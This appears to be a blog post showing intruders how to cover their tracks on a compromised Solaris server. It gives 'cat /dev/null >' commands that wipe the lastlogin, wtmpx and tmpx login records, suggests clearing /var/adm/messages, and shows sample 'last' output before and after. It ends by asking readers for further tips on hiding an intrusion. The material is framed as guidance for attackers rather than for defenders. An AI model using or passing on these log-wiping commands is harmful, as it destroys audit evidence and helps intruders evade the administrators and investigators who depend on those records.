In the Monitoring User Login post, the commands and files that are related in tracking user activities are discussed.
Here are some ways of covering your fingerprints on a server using the files that monitors user logins.
We want to erase any trace that will show that we were inside the box. In doing so we’ll just:
cat /dev/null > <file>
Lastlog file
Clear out the last log file if you’re using an existing user from the box. Lastlogin file shows when and where a particular user last login from.
login: razile
Password:Last login: Fri Oct 21 21:50:02 2007 from 210.2.9.1
Sun Microsystems Inc. SunOS 5.9 Generic May 2002
razile@unix-box %
Erase that if you don’t want the admin see where you last login from (IP, hostname, time etc)
cat /dev/null > /var/adm/lastlogin
After clearing the lastlog file, comparing the first login and the second one:
(first login)
Last login: Thu Nov 1 21:33:41 2007 from 210.23.109.1
Sun Microsystems Inc. SunOS 5.9 Generic May 2002
user@server->
(after deletion)
Sun Microsystems Inc. SunOS 5.9 Generic May 2002
bash: unalias: `e’: not an alias
user@server->
wtmpx/tmpx files
If you want to check those users who logged in to a Unix box, type in ‘last’
UnixBox# last | more
root pts/21 101.221.224.61 Sat Nov 3 11:38 still logged in
sitescp pts/20 19.168.128.132 Sat Nov 3 07:00 still logged in
root pts/23 101.221.224.51 Sat Nov 3 05:05 still logged in
root pts/22 101.221.224.51 Sat Nov 3 05:05 still logged in
paladel pts/22 14.122.4.99 Fri Nov 2 14:33 – 15:32 (00:59)
boy1 pts/26 14.122.4.67 Fri Nov 2 13:22 – 14:50 (01:28)
boy2 pts/26 14.122.4.67 Fri Nov 2 13:20 – 13:22 (00:02)
You’ll see the user who was logged in, the terminal used, the IP where he came from the date or duration of his activity in the server.
That is a lot of information, so in covering up your track, delete or zero out the files that stores these information
cat /dev/null > /var/adm/wtmpx
cat /dev/null > /var/adm/tmpx
After doing so, you’ll get this when doing ‘last’
# cat /dev/null > /var/adm/wtmpx
# last | morewtmp begins Sun Nov 4 00:41
#
You could also zero out the /var/adm/messages if you’re really paranoid.
Of course doing these is like shouting and telling the whole universe that you were there.
These are just a few to cover you track… Do you have any additions? Or any tips in covering the intrusion without knowing that you were there?